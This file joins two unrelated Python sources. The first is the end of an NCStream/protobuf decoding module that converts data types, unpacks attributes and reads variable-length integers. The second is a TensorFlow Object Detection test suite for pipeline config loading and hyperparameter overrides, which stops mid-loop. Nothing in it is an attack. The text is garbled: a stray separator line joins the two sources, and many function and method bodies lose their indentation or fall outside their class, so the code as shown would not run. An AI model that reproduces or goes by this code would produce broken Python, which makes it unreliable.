    Object dtypes (STRING, OPAQUE) take no byte order; everything else is
    returned in native byte order, with ``unsigned=True`` switching integer
    codes to their unsigned counterparts.
    """
    code = _dtype_lookup[datatype]
    if datatype in (stream.STRING, stream.OPAQUE):
        return np.dtype(code)
    return np.dtype('=' + (code.replace('i', 'u') if unsigned else code))
def struct_to_dtype(struct):
    """Convert a Structure specification to a numpy structured dtype."""
    # str() keeps field names as native strings: protobuf yields unicode,
    # which dtype field names don't support on Python 2.
    fields = [(str(var.name), data_type_to_numpy(var.dataType, var.unsigned))
              for var in struct.vars]
    fields.extend((str(sub.name), struct_to_dtype(sub))
                  for sub in struct.structs)
    log.debug('Structure fields: %s', fields)
    return np.dtype(fields)
def unpack_variable(var):
    """Unpack an NCStream Variable into information we can use.

    Returns
    -------
    tuple
        ``(data, dtype, type_name)`` where ``data`` is any inline variable
        data (or None), ``dtype`` the numpy dtype, and ``type_name`` a
        human-readable type label.
    """
    # If we actually get a structure instance, handle turning that into a variable
    if var.dataType == stream.STRUCTURE:
        return None, struct_to_dtype(var), 'Structure'
    elif var.dataType == stream.SEQUENCE:
        # NOTE(review): this only warns and then falls through to
        # data_type_to_numpy, whose _dtype_lookup has no SEQUENCE entry --
        # that would raise KeyError. Confirm whether sequences ever reach here.
        log.warning('Sequence support not implemented!')
    dt = data_type_to_numpy(var.dataType, var.unsigned)
    if var.dataType == stream.OPAQUE:
        type_name = 'opaque'
    elif var.dataType == stream.STRING:
        type_name = 'string'
    else:
        type_name = dt.name
    if var.data:
        log.debug('Storing variable data: %s %s', dt, var.data)
        if var.dataType == stream.STRING:
            data = var.data
        else:
            # Always sent big endian
            data = np.frombuffer(var.data, dtype=dt.newbyteorder('>'))
    else:
        data = None
    return data, dt, type_name
# Map old-style (pre-TDS 5.0) attribute type codes to big-endian numpy
# dtypes, used by unpack_attribute for the legacy `type` field.
_attr_converters = {stream.Attribute.BYTE: np.dtype('>b'),
                    stream.Attribute.SHORT: np.dtype('>i2'),
                    stream.Attribute.INT: np.dtype('>i4'),
                    stream.Attribute.LONG: np.dtype('>i8'),
                    stream.Attribute.FLOAT: np.dtype('>f4'),
                    stream.Attribute.DOUBLE: np.dtype('>f8')}
def unpack_attribute(att):
    """Unpack an embedded attribute into a python or numpy object.

    Returns
    -------
    tuple
        ``(name, value)`` for the attribute; single-element values are
        unwrapped to a scalar.
    """
    if att.unsigned:
        log.warning('Unsupported unsigned attribute!')
    # TDS 5.0 now has a dataType attribute that takes precedence
    # Branch order matters: new-style dataType first, then the legacy
    # `type` field, then the legacy string field.
    if att.len == 0:  # Empty
        val = None
    elif att.dataType == stream.STRING:  # Then look for new datatype string
        val = att.sdata
    elif att.dataType:  # Then a non-zero new data type
        val = np.frombuffer(att.data,
                            dtype='>' + _dtype_lookup[att.dataType], count=att.len)
    elif att.type:  # Then non-zero old-data type0
        val = np.frombuffer(att.data,
                            dtype=_attr_converters[att.type], count=att.len)
    elif att.sdata:  # This leaves both 0, try old string
        val = att.sdata
    else:  # Assume new datatype is Char (0)
        val = np.array(att.data, dtype=_dtype_lookup[att.dataType])
    if att.len == 1:
        val = val[0]
    return att.name, val
def read_var_int(file_obj):
    """Read a variable-length integer (LEB128-style, little-endian groups).

    Each byte contributes its low 7 bits; the high bit set means more
    bytes follow. Groups stack leftward, so earlier bytes are less
    significant.

    Parameters
    ----------
    file_obj : file-like object
        The file to read from.

    Returns
    -------
    int
        the variable-length value read
    """
    result = 0
    shift = 0
    more = True
    while more:
        byte = ord(file_obj.read(1))
        result |= (byte & 0x7F) << shift
        shift += 7
        more = bool(byte & 0x80)
    return result
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.utils.config_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import range
import tensorflow as tf
from google.protobuf import text_format
from object_detection.protos import eval_pb2
from object_detection.protos import image_resizer_pb2
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
from object_detection.utils import config_util
def _write_config(config, config_path):
  """Serializes a config proto to *config_path* in text format."""
  serialized = text_format.MessageToString(config)
  with tf.gfile.Open(config_path, "wb") as config_file:
    config_file.write(serialized)
def _update_optimizer_with_constant_learning_rate(optimizer, learning_rate):
"""Adds a new constant learning rate."""
constant_lr = optimizer.learning_rate.constant_learning_rate
constant_lr.learning_rate = learning_rate
def _update_optimizer_with_exponential_decay_learning_rate(
optimizer, learning_rate):
"""Adds a new exponential decay learning rate."""
exponential_lr = optimizer.learning_rate.exponential_decay_learning_rate
exponential_lr.initial_learning_rate = learning_rate
def _update_optimizer_with_manual_step_learning_rate(
optimizer, initial_learning_rate, learning_rate_scaling):
"""Adds a learning rate schedule."""
manual_lr = optimizer.learning_rate.manual_step_learning_rate
manual_lr.initial_learning_rate = initial_learning_rate
for i in range(3):
schedule = manual_lr.schedule.add()
schedule.learning_rate = initial_learning_rate * learning_rate_scaling**i
def _update_optimizer_with_cosine_decay_learning_rate(
optimizer, learning_rate, warmup_learning_rate):
"""Adds a new cosine decay learning rate."""
cosine_lr = optimizer.learning_rate.cosine_decay_learning_rate
cosine_lr.learning_rate_base = learning_rate
cosine_lr.warmup_learning_rate = warmup_learning_rate
class ConfigUtilTest(tf.test.TestCase):
def _create_and_load_test_configs(self, pipeline_config):
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
_write_config(pipeline_config, pipeline_config_path)
return config_util.get_configs_from_pipeline_file(pipeline_config_path)
  def test_get_configs_from_pipeline_file(self):
    """Test that proto configs can be read from pipeline config file."""
    pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
    # Build a minimal pipeline proto touching every top-level section.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    pipeline_config.model.faster_rcnn.num_classes = 10
    pipeline_config.train_config.batch_size = 32
    pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
    pipeline_config.eval_config.num_examples = 20
    pipeline_config.eval_input_reader.add().queue_capacity = 100
    _write_config(pipeline_config, pipeline_config_path)
    configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
    # Each section of the written proto must survive the round trip into
    # the configs dictionary unchanged.
    self.assertProtoEquals(pipeline_config.model, configs["model"])
    self.assertProtoEquals(pipeline_config.train_config,
                           configs["train_config"])
    self.assertProtoEquals(pipeline_config.train_input_reader,
                           configs["train_input_config"])
    self.assertProtoEquals(pipeline_config.eval_config,
                           configs["eval_config"])
    self.assertProtoEquals(pipeline_config.eval_input_reader,
                           configs["eval_input_configs"])
  def test_create_configs_from_pipeline_proto(self):
    """Tests creating configs dictionary from pipeline proto."""
    # Build a minimal pipeline proto touching every top-level section.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    pipeline_config.model.faster_rcnn.num_classes = 10
    pipeline_config.train_config.batch_size = 32
    pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
    pipeline_config.eval_config.num_examples = 20
    pipeline_config.eval_input_reader.add().queue_capacity = 100
    # Convert directly (no disk round trip) and check each section.
    configs = config_util.create_configs_from_pipeline_proto(pipeline_config)
    self.assertProtoEquals(pipeline_config.model, configs["model"])
    self.assertProtoEquals(pipeline_config.train_config,
                           configs["train_config"])
    self.assertProtoEquals(pipeline_config.train_input_reader,
                           configs["train_input_config"])
    self.assertProtoEquals(pipeline_config.eval_config, configs["eval_config"])
    self.assertProtoEquals(pipeline_config.eval_input_reader,
                           configs["eval_input_configs"])
  def test_create_pipeline_proto_from_configs(self):
    """Tests that proto can be reconstructed from configs dictionary."""
    pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
    # Build a minimal pipeline proto touching every top-level section.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    pipeline_config.model.faster_rcnn.num_classes = 10
    pipeline_config.train_config.batch_size = 32
    pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
    pipeline_config.eval_config.num_examples = 20
    pipeline_config.eval_input_reader.add().queue_capacity = 100
    _write_config(pipeline_config, pipeline_config_path)
    # Load into a configs dict, then rebuild the proto and verify the
    # round trip is lossless.
    configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
    pipeline_config_reconstructed = (
        config_util.create_pipeline_proto_from_configs(configs))
    self.assertEqual(pipeline_config, pipeline_config_reconstructed)
  def test_save_pipeline_config(self):
    """Tests that the pipeline config is properly saved to disk."""
    # Build a minimal pipeline proto touching every top-level section.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    pipeline_config.model.faster_rcnn.num_classes = 10
    pipeline_config.train_config.batch_size = 32
    pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
    pipeline_config.eval_config.num_examples = 20
    pipeline_config.eval_input_reader.add().queue_capacity = 100
    # save_pipeline_config writes "pipeline.config" into the given
    # directory; read it back and verify the round trip is lossless.
    config_util.save_pipeline_config(pipeline_config, self.get_temp_dir())
    configs = config_util.get_configs_from_pipeline_file(
        os.path.join(self.get_temp_dir(), "pipeline.config"))
    pipeline_config_reconstructed = (
        config_util.create_pipeline_proto_from_configs(configs))
    self.assertEqual(pipeline_config, pipeline_config_reconstructed)
def test_get_configs_from_multiple_files(self):
"""Tests that proto configs can be read from multiple files."""
temp_dir = self.get_temp_dir()
# Write model config file.
model_config_path = os.path.join(temp_dir, "model.config")
model = model_pb2.DetectionModel()
model.faster_rcnn.num_classes = 10
_write_config(model, model_config_path)
# Write train config file.
train_config_path = os.path.join(temp_dir, "train.config")
train_config = train_config = train_pb2.TrainConfig()
train_config.batch_size = 32
_write_config(train_config, train_config_path)
# Write train input config file.
train_input_config_path = os.path.join(temp_dir, "train_input.config")
train_input_config = input_reader_pb2.InputReader()
train_input_config.label_map_path = "path/to/label_map"
_write_config(train_input_config, train_input_config_path)
# Write eval config file.
eval_config_path = os.path.join(temp_dir, "eval.config")
eval_config = eval_pb2.EvalConfig()
eval_config.num_examples = 20
_write_config(eval_config, eval_config_path)
# Write eval input config file.
eval_input_config_path = os.path.join(temp_dir, "eval_input.config")
eval_input_config = input_reader_pb2.InputReader()
eval_input_config.label_map_path = "path/to/another/label_map"
_write_config(eval_input_config, eval_input_config_path)
configs = config_util.get_configs_from_multiple_files(
model_config_path=model_config_path,
train_config_path=train_config_path,
train_input_config_path=train_input_config_path,
eval_config_path=eval_config_path,
eval_input_config_path=eval_input_config_path)
self.assertProtoEquals(model, configs["model"])
self.assertProtoEquals(train_config, configs["train_config"])
self.assertProtoEquals(train_input_config,
configs["train_input_config"])
self.assertProtoEquals(eval_config, configs["eval_config"])
self.assertProtoEquals(eval_input_config, configs["eval_input_configs"][0])
def _assertOptimizerWithNewLearningRate(self, optimizer_name):
    """Asserts successful updating of all learning rate schemes.

    For each supported learning-rate schedule (constant, exponential decay,
    manual step, cosine decay): builds a pipeline config using the named
    optimizer, round-trips it through disk, merges the hparams override,
    and checks the resulting learning rate(s). The repeated
    write/reload/merge/fetch sequence is factored into a nested helper.

    Args:
      optimizer_name: name of the optimizer field inside
        TrainConfig.optimizer (e.g. "rms_prop_optimizer").
    """
    original_learning_rate = 0.7
    learning_rate_scaling = 0.1
    warmup_learning_rate = 0.07
    hparams = tf.contrib.training.HParams(learning_rate=0.15)
    pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")

    def _merged_optimizer(pipeline_config):
        # Write the config, reload it, merge hparams, return the optimizer.
        _write_config(pipeline_config, pipeline_config_path)
        configs = config_util.get_configs_from_pipeline_file(
            pipeline_config_path)
        configs = config_util.merge_external_params_with_configs(
            configs, hparams)
        return getattr(configs["train_config"].optimizer, optimizer_name)

    # Constant learning rate.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
    _update_optimizer_with_constant_learning_rate(optimizer,
                                                  original_learning_rate)
    constant_lr = _merged_optimizer(
        pipeline_config).learning_rate.constant_learning_rate
    self.assertAlmostEqual(hparams.learning_rate, constant_lr.learning_rate)

    # Exponential decay learning rate.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
    _update_optimizer_with_exponential_decay_learning_rate(
        optimizer, original_learning_rate)
    exponential_lr = _merged_optimizer(
        pipeline_config).learning_rate.exponential_decay_learning_rate
    self.assertAlmostEqual(hparams.learning_rate,
                           exponential_lr.initial_learning_rate)

    # Manual step learning rate: the initial rate is replaced and every
    # schedule entry is rescaled by successive powers of the scaling factor.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
    _update_optimizer_with_manual_step_learning_rate(
        optimizer, original_learning_rate, learning_rate_scaling)
    manual_lr = _merged_optimizer(
        pipeline_config).learning_rate.manual_step_learning_rate
    self.assertAlmostEqual(hparams.learning_rate,
                           manual_lr.initial_learning_rate)
    for i, schedule in enumerate(manual_lr.schedule):
        self.assertAlmostEqual(hparams.learning_rate * learning_rate_scaling**i,
                               schedule.learning_rate)

    # Cosine decay learning rate: warmup is rescaled proportionally to the
    # original warmup/base ratio.
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
    _update_optimizer_with_cosine_decay_learning_rate(optimizer,
                                                      original_learning_rate,
                                                      warmup_learning_rate)
    cosine_lr = _merged_optimizer(
        pipeline_config).learning_rate.cosine_decay_learning_rate
    self.assertAlmostEqual(hparams.learning_rate, cosine_lr.learning_rate_base)
    warmup_scale_factor = warmup_learning_rate / original_learning_rate
    self.assertAlmostEqual(hparams.learning_rate * warmup_scale_factor,
                           cosine_lr.warmup_learning_rate)
# NOTE(review): "Learing" is a typo, but renaming would change the test id,
# so the method name is kept as-is.
def testRMSPropWithNewLearingRate(self):
    """Tests new learning rates for RMSProp Optimizer."""
    self._assertOptimizerWithNewLearningRate("rms_prop_optimizer")
def testMomentumOptimizerWithNewLearningRate(self):
    """Tests new learning rates for Momentum Optimizer."""
    # Delegates to the shared helper parameterized by optimizer field name.
    self._assertOptimizerWithNewLearningRate("momentum_optimizer")
def testAdamOptimizerWithNewLearningRate(self):
    """Tests new learning rates for Adam Optimizer."""
    # Delegates to the shared helper parameterized by optimizer field name.
    self._assertOptimizerWithNewLearningRate("adam_optimizer")
def testGenericConfigOverride(self):
    """Tests generic config overrides for all top-level configs."""
    # Seed one field in every top-level config so each override is observable.
    original = pipeline_pb2.TrainEvalPipelineConfig()
    original.model.ssd.num_classes = 1
    original.train_config.batch_size = 1
    original.eval_config.num_visualizations = 1
    original.train_input_reader.label_map_path = "/some/path"
    original.eval_input_reader.add().label_map_path = "/some/path"
    original.graph_rewriter.quantization.weight_bits = 1
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    _write_config(original, config_file)

    # Override each seeded field through hparams keys.
    overrides = {
        "model.ssd.num_classes": 2,
        "train_config.batch_size": 2,
        "train_input_config.label_map_path": "/some/other/path",
        "eval_config.num_visualizations": 2,
        "graph_rewriter_config.quantization.weight_bits": 2,
    }
    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, tf.contrib.training.HParams(**overrides))

    # Every field must now hold its overridden value.
    self.assertEqual(2, configs["model"].ssd.num_classes)
    self.assertEqual(2, configs["train_config"].batch_size)
    self.assertEqual("/some/other/path",
                     configs["train_input_config"].label_map_path)
    self.assertEqual(2, configs["eval_config"].num_visualizations)
    self.assertEqual(2,
                     configs["graph_rewriter_config"].quantization.weight_bits)
def testNewBatchSize(self):
    """Tests that batch size is updated appropriately."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.batch_size = 2
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, tf.contrib.training.HParams(batch_size=16))
    self.assertEqual(16, configs["train_config"].batch_size)
def testNewBatchSizeWithClipping(self):
    """Tests that batch size is clipped to 1 from below."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.batch_size = 2
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    # A fractional batch size below 1 must be rounded up to the minimum of 1.
    configs = config_util.merge_external_params_with_configs(
        configs, tf.contrib.training.HParams(batch_size=0.5))
    self.assertEqual(1, configs["train_config"].batch_size)
def testOverwriteBatchSizeWithKeyValue(self):
    """Tests that batch size is overwritten based on key/value."""
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.batch_size = 2
    configs = self._create_and_load_test_configs(proto)
    hparams = tf.contrib.training.HParams(**{"train_config.batch_size": 10})
    configs = config_util.merge_external_params_with_configs(configs, hparams)
    self.assertEqual(10, configs["train_config"].batch_size)
def testKeyValueOverrideBadKey(self):
    """Tests that overwriting with a bad key causes an exception."""
    configs = self._create_and_load_test_configs(
        pipeline_pb2.TrainEvalPipelineConfig())
    bad_hparams = tf.contrib.training.HParams(
        **{"train_config.no_such_field": 10})
    with self.assertRaises(ValueError):
        config_util.merge_external_params_with_configs(configs, bad_hparams)
def testOverwriteBatchSizeWithBadValueType(self):
    """Tests that overwriting with a bad value type causes an exception."""
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.batch_size = 2
    configs = self._create_and_load_test_configs(proto)
    # batch_size is an integer field; the string "10" must be rejected.
    bad_hparams = tf.contrib.training.HParams(
        **{"train_config.batch_size": "10"})
    with self.assertRaises(TypeError):
        config_util.merge_external_params_with_configs(configs, bad_hparams)
def testNewMomentumOptimizerValue(self):
    """Tests that new momentum value is updated appropriately."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.optimizer.rms_prop_optimizer.momentum_optimizer_value = (
        0.4)
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    # The requested momentum of 1.1 is out of range and must be clipped.
    configs = config_util.merge_external_params_with_configs(
        configs, tf.contrib.training.HParams(momentum_optimizer_value=1.1))
    rms_prop = configs["train_config"].optimizer.rms_prop_optimizer
    self.assertAlmostEqual(1.0, rms_prop.momentum_optimizer_value)
def testNewClassificationLocalizationWeightRatio(self):
    """Tests that the loss weight ratio is updated appropriately."""
    new_weight_ratio = 5.0
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.model.ssd.loss.localization_weight = 0.1
    proto.model.ssd.loss.classification_weight = 0.2
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs,
        tf.contrib.training.HParams(
            classification_localization_weight_ratio=new_weight_ratio))

    # Localization weight normalizes to 1.0; classification carries the ratio.
    loss = configs["model"].ssd.loss
    self.assertAlmostEqual(1.0, loss.localization_weight)
    self.assertAlmostEqual(new_weight_ratio, loss.classification_weight)
def testNewFocalLossParameters(self):
    """Tests that focal-loss alpha and gamma are updated appropriately."""
    new_alpha = 0.3
    new_gamma = 2.0
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    focal = proto.model.ssd.loss.classification_loss.weighted_sigmoid_focal
    focal.alpha = 1.0
    focal.gamma = 1.0
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs,
        tf.contrib.training.HParams(
            focal_loss_alpha=new_alpha, focal_loss_gamma=new_gamma))
    focal = configs["model"].ssd.loss.classification_loss.weighted_sigmoid_focal
    self.assertAlmostEqual(new_alpha, focal.alpha)
    self.assertAlmostEqual(new_gamma, focal.gamma)
def testMergingKeywordArguments(self):
    """Tests that keyword arguments get merged as do hyperparameters."""
    desired_steps = 10
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_config.num_steps = 100
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"train_steps": desired_steps})
    self.assertEqual(desired_steps, configs["train_config"].num_steps)
def testGetNumberOfClasses(self):
    """Tests that number of classes can be retrieved."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.model.faster_rcnn.num_classes = 20
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    self.assertEqual(20, config_util.get_number_of_classes(configs["model"]))
def testNewTrainInputPath(self):
    """Tests that train input path can be overwritten with single file."""
    new_train_path = "another/path/to/data"
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.tf_record_input_reader.input_path.extend(
        ["path/to/data"])
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"train_input_path": new_train_path})

    # A scalar override replaces the repeated field with a single entry.
    self.assertEqual(
        [new_train_path],
        configs["train_input_config"].tf_record_input_reader.input_path)
def testNewTrainInputPathList(self):
    """Tests that train input path can be overwritten with multiple files."""
    new_train_paths = ["another/path/to/data", "yet/another/path/to/data"]
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.tf_record_input_reader.input_path.extend(
        ["path/to/data"])
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"train_input_path": new_train_paths})

    # A list override replaces the repeated field wholesale.
    self.assertEqual(
        new_train_paths,
        configs["train_input_config"].tf_record_input_reader.input_path)
def testNewLabelMapPath(self):
    """Tests that label map path can be overwritten in input readers."""
    old_path = "path/to/original/label_map"
    new_path = "path//to/new/label_map"
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.label_map_path = old_path
    proto.eval_input_reader.add().label_map_path = old_path
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"label_map_path": new_path})

    # Both the train reader and every eval reader pick up the new path.
    self.assertEqual(new_path, configs["train_input_config"].label_map_path)
    for eval_input_config in configs["eval_input_configs"]:
        self.assertEqual(new_path, eval_input_config.label_map_path)
def testDontOverwriteEmptyLabelMapPath(self):
    """Tests that label map path will not be overwritten with empty string."""
    old_path = "path/to/original/label_map"
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.label_map_path = old_path
    proto.eval_input_reader.add().label_map_path = old_path
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"label_map_path": ""})

    # The empty-string override is ignored; both readers keep the original.
    self.assertEqual(old_path, configs["train_input_config"].label_map_path)
    self.assertEqual(old_path, configs["eval_input_configs"][0].label_map_path)
def testNewMaskType(self):
    """Tests that mask type can be overwritten in input readers."""
    new_mask_type = input_reader_pb2.PNG_MASKS
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.mask_type = input_reader_pb2.NUMERICAL_MASKS
    proto.eval_input_reader.add().mask_type = input_reader_pb2.NUMERICAL_MASKS
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"mask_type": new_mask_type})
    self.assertEqual(new_mask_type, configs["train_input_config"].mask_type)
    self.assertEqual(new_mask_type, configs["eval_input_configs"][0].mask_type)
def testUseMovingAverageForEval(self):
    """Tests the eval_with_moving_averages override of the eval config."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_config.use_moving_averages = False
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"eval_with_moving_averages": True})
    # assertTrue instead of assertEqual(True, ...): same check, clearer intent.
    self.assertTrue(configs["eval_config"].use_moving_averages)
def testGetImageResizerConfig(self):
    """Tests that the image resizer config can be retrieved."""
    model_config = model_pb2.DetectionModel()
    resizer = model_config.faster_rcnn.image_resizer.fixed_shape_resizer
    resizer.height = 100
    resizer.width = 300
    resizer_config = config_util.get_image_resizer_config(model_config)
    self.assertEqual(resizer_config.fixed_shape_resizer.height, 100)
    self.assertEqual(resizer_config.fixed_shape_resizer.width, 300)
def testGetSpatialImageSizeFromFixedShapeResizerConfig(self):
    """A fixed-shape resizer yields its configured [height, width]."""
    resizer = image_resizer_pb2.ImageResizer()
    resizer.fixed_shape_resizer.height = 100
    resizer.fixed_shape_resizer.width = 200
    self.assertAllEqual(config_util.get_spatial_image_size(resizer),
                        [100, 200])
def testGetSpatialImageSizeFromAspectPreservingResizerConfig(self):
    """With pad_to_max_dimension the static size is [max_dim, max_dim]."""
    resizer = image_resizer_pb2.ImageResizer()
    resizer.keep_aspect_ratio_resizer.min_dimension = 100
    resizer.keep_aspect_ratio_resizer.max_dimension = 600
    resizer.keep_aspect_ratio_resizer.pad_to_max_dimension = True
    self.assertAllEqual(config_util.get_spatial_image_size(resizer),
                        [600, 600])
def testGetSpatialImageSizeFromAspectPreservingResizerDynamic(self):
    """Without padding the output size is dynamic, reported as [-1, -1]."""
    resizer = image_resizer_pb2.ImageResizer()
    resizer.keep_aspect_ratio_resizer.min_dimension = 100
    resizer.keep_aspect_ratio_resizer.max_dimension = 600
    self.assertAllEqual(config_util.get_spatial_image_size(resizer), [-1, -1])
def testGetSpatialImageSizeFromConditionalShapeResizer(self):
    """A conditional-shape resizer has a dynamic output size: [-1, -1]."""
    resizer = image_resizer_pb2.ImageResizer()
    resizer.conditional_shape_resizer.size_threshold = 100
    self.assertAllEqual(config_util.get_spatial_image_size(resizer), [-1, -1])
def testEvalShuffle(self):
    """The `eval_shuffle` keyword override reaches the eval input reader."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_input_reader.add().shuffle = True
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"eval_shuffle": False})
    self.assertFalse(configs["eval_input_configs"][0].shuffle)
def testTrainShuffle(self):
    """The `train_shuffle` keyword override reaches the train input reader."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.shuffle = True
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"train_shuffle": False})
    self.assertFalse(configs["train_input_config"].shuffle)
def testOverWriteRetainOriginalImages(self):
    """The `retain_original_images_in_eval` override updates the eval config."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_config.retain_original_images = True
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"retain_original_images_in_eval": False})
    self.assertFalse(configs["eval_config"].retain_original_images)
def testOverwriteAllEvalSampling(self):
    """The sampling override is applied to every eval input reader."""
    new_sample = 10
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    for _ in range(2):
        proto.eval_input_reader.add().sample_1_of_n_examples = 1
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"sample_1_of_n_eval_examples": new_sample})
    for eval_input_config in configs["eval_input_configs"]:
        self.assertEqual(new_sample, eval_input_config.sample_1_of_n_examples)
def testOverwriteAllEvalNumEpochs(self):
    """The num-epochs override is applied to every eval input reader."""
    new_num_epochs = 1
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    for _ in range(2):
        proto.eval_input_reader.add().num_epochs = 10
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"eval_num_epochs": new_num_epochs})
    for eval_input_config in configs["eval_input_configs"]:
        self.assertEqual(new_num_epochs, eval_input_config.num_epochs)
def testUpdateMaskTypeForAllInputConfigs(self):
    """The mask-type override reaches the train reader and all eval readers."""
    new_mask_type = input_reader_pb2.PNG_MASKS
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.train_input_reader.mask_type = input_reader_pb2.NUMERICAL_MASKS
    for name in ("eval_1", "eval_2"):
